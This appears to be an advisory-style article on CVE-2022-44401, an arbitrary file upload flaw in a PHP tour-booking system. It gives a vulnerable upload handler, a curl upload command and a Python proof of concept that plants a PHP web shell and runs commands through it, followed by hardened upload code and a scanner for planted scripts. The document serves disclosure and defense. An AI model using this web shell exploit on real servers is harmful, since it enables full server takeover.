The world of travel is rapidly becoming digital, and with more people booking tours online, keeping software secure is more important than ever. But sometimes, even popular solutions like Online Tours & Travels Management System aren’t as safe as they seem. In late 2022, a critical security bug surfaced in this system—CVE-2022-44401. This vulnerability allows attackers to upload ANY file they want, which can lead to your server being completely taken over.
This article will explain this vulnerability in simple English, show you working code snippets, give you links for further reading, and break down how hackers could exploit it. If you run or develop for Online Tours & Travels Management System v1., you need to pay attention.
What is CVE-2022-44401?
CVE-2022-44401 is an arbitrary file upload vulnerability found in the Online Tours & Travels Management System v1., specifically in the /tour/admin/file.php endpoint.
In simple terms: An attacker can send a crafted request and upload any file (including dangerous scripts), with no checks stopping them.
This kind of vulnerability usually leads to remote code execution (RCE), which means a hacker can run dangerous commands on your server.
Where Is the Vulnerability?
The problem exists in the file handling code in /tour/admin/file.php. This PHP script lets users upload files but does not properly check the file type or contents.
Here’s a very simplified (but realistic) look at what the code might resemble inside file.php:

```php
<?php
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["file"]["name"]);
// No file extension or MIME type check!
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
    echo "The file " . htmlspecialchars(basename($_FILES["file"]["name"])) . " has been uploaded.";
} else {
    echo "Sorry, there was an error uploading your file.";
}
?>
```
Notice: there is no check on the file type or contents, and the client-supplied filename (extension included) is reused inside the web-accessible uploads/ directory, so an uploaded .php file becomes a script the server will execute.
Upload the Malicious File:
- The attacker uploads this through /tour/admin/file.php as if they were uploading a normal file, using a tool like curl:

```bash
curl -F "file=@shell.php" http://target-site/tour/admin/file.php
```

- The uploaded file is then reachable from the web at:

```
http://target-site/tour/admin/uploads/shell.php?cmd=whoami
```
If an attacker succeeds:
- They can run ANY command (like deleting the database, defacing the website, or stealing sensitive information).
Here’s a step-by-step PoC in Python using requests:

```python
import requests

# Target file upload endpoint
url = 'http://target-site/tour/admin/file.php'
# Path where uploaded files go (based on code, e.g., /uploads/)
uploaded_url = 'http://target-site/tour/admin/uploads/shell.php'

# 1. Prepare the malicious payload
files = {'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}

# 2. Upload the shell
response = requests.post(url, files=files)
print(response.text)

# 3. Trigger a command
cmd_response = requests.get(uploaded_url, params={'cmd': 'id'})
print(cmd_response.text)
```
Official Reference Links
- CVE Details for CVE-2022-44401
- Exploit Proof (Exploit-DB)
1. Apply File Type Checks: Only allow uploads with safe extensions (e.g., .jpg, .png).
2. Check MIME Types: Ensure the MIME type is image/* when uploading images.
3. Rename Files: Give uploaded files random names and do NOT allow direct execution.
4. Move Uploads Outside Web Root: Prevent direct access/execution of uploads.
Example: Safe File Upload Logic

```php
<?php
// Detect the MIME type from the file contents on the server.
// $_FILES['file']['type'] is sent by the client and can be set to anything.
$allowed_types = ['image/jpeg', 'image/png'];
$finfo = new finfo(FILEINFO_MIME_TYPE);
$detected_type = $finfo->file($_FILES['file']['tmp_name']);
if (in_array($detected_type, $allowed_types, true)) {
    // proceed with move_uploaded_file (random name, directory outside the web root)
} else {
    echo "Invalid file type.";
}
```
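The snippet above shows only the MIME check. Below is an added example (not code from the Online Tours & Travels project) of a complete replacement handler that applies all four mitigations from the list: an extension allowlist, content-based MIME detection, a random server-chosen filename, and storage outside the web root. The storage path, the size cap and the assumption that files are later served through a separate download script are all assumptions of this example; authentication of the admin endpoint is left to the surrounding application.

```php
<?php
// Added example, not the project's own file.php. Hardened upload handler that
// applies the four mitigations above. Assumes STORAGE_DIR is outside the web
// root and writable by the PHP process, and that stored files are served only
// through a separate download script, never by direct URL.
declare(strict_types=1);

// 1. Allowlist: permitted extensions and the content type each one must have.
const ALLOWED = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
];
const MAX_BYTES = 2 * 1024 * 1024;                 // 2 MiB cap (assumed limit)
const STORAGE_DIR = '/var/app-data/tour-uploads';  // assumed path, outside web root

function store_upload(array $file): string
{
    // Reject anything PHP itself flagged, anything not from a real upload, and oversized files.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('Rejected upload');
    }

    // 1. Extension allowlist. The client name is used only to pick the extension.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException('Extension not allowed');
    }

    // 2. MIME type detected from the bytes on disk, never from $_FILES[...]['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED[$ext], true)) {
        throw new RuntimeException('Content does not match extension');
    }

    // 3. Random server-chosen name; the original filename never reaches the filesystem.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;

    // 4. Store outside the web root, so nothing in this directory can be executed via URL.
    $dest = STORAGE_DIR . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);  // readable by the app, not executable
    return $newName;
}

if (isset($_FILES['file'])) {
    try {
        $stored = store_upload($_FILES['file']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```

The extension and the detected MIME type must agree with each other, not merely each appear in some list: a file named photo.png whose bytes are really a PHP script fails step 2 even though "png" is allowed. Because the stored name is random and the directory is not web-served, a file that slipped through would still not be reachable at a URL like the uploads/shell.php one shown earlier.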
Conclusion
CVE-2022-44401 is a high-severity bug in Online Tours & Travels Management System v1. that puts any website running it at serious risk. Arbitrary file upload is a classic but deadly PHP mistake. If you’re using or developing on this platform: patch your system, audit your code, and ALWAYS sanitize file uploads.
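Auditing an existing deployment means more than reviewing the code: a system that has been exposed may already hold uploaded scripts. The following is an added example (not part of the original article or the project) that walks the uploads directory and lists files with a script extension or a PHP open tag in their first bytes. The directory path is an assumption based on the /tour/admin/uploads/ location described above; the list of extensions is the example's own.

```php
<?php
// Added example, not the project's code: audit the uploads directory for files
// that look like server-side scripts. Assumed path below; adjust per deployment.
declare(strict_types=1);

const UPLOAD_DIR = __DIR__ . '/uploads';   // assumed: /tour/admin/uploads/
const SCRIPT_EXTS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar'];

function scan_uploads(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $path => $info) {
        if (!$info->isFile()) {
            continue;
        }
        $reasons = [];
        $ext = strtolower($info->getExtension());
        if (in_array($ext, SCRIPT_EXTS, true)) {
            $reasons[] = 'script extension';
        }
        // Read only the head of the file; a PHP open tag inside an "image" is a red flag.
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        if (strpos($head, '<?php') !== false || strpos($head, '<?=') !== false) {
            $reasons[] = 'contains PHP open tag';
        }
        if ($reasons !== []) {
            $findings[] = [
                'path'    => $path,
                'mtime'   => date('c', $info->getMTime()),
                'reasons' => $reasons,
            ];
        }
    }
    return $findings;
}

foreach (scan_uploads(UPLOAD_DIR) as $f) {
    printf("%s (%s): %s\n", $f['path'], $f['mtime'], implode(', ', $f['reasons']));
}
```

Run it with the PHP CLI as the web server's user so that permissions match what the application can see. The modification time printed for each finding gives a starting point for correlating with web-server access logs for /tour/admin/file.php, which is where any POST that created the file would have been recorded.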
If you found this helpful or need technical advice, stay tuned—or reach out!
Timeline
Published on: 11/28/2022 15:15:00 UTC
Last modified on: 11/28/2022 19:15:00 UTC